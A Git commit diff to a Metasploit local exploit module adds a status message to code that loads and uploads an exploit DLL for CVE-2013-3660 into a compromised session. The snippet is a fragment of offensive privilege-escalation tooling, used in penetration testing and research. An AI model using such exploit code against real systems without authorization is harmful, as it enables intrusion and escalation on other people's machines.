Add a new print_status

unstable
jvazquez-r7 2013-06-28 18:23:49 -05:00
parent 7725937461
commit 00416f3430
1 changed files with 2 additions and 0 deletions

View File

@ -131,6 +131,8 @@ class Metasploit3 < Msf::Exploit::Local
vprint_status("Adding the railgun stuff...")
add_railgun_functions
print_status("Trying to load the exploit and executing...")
session.core.load_library({
"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
"UploadLibrary" => true,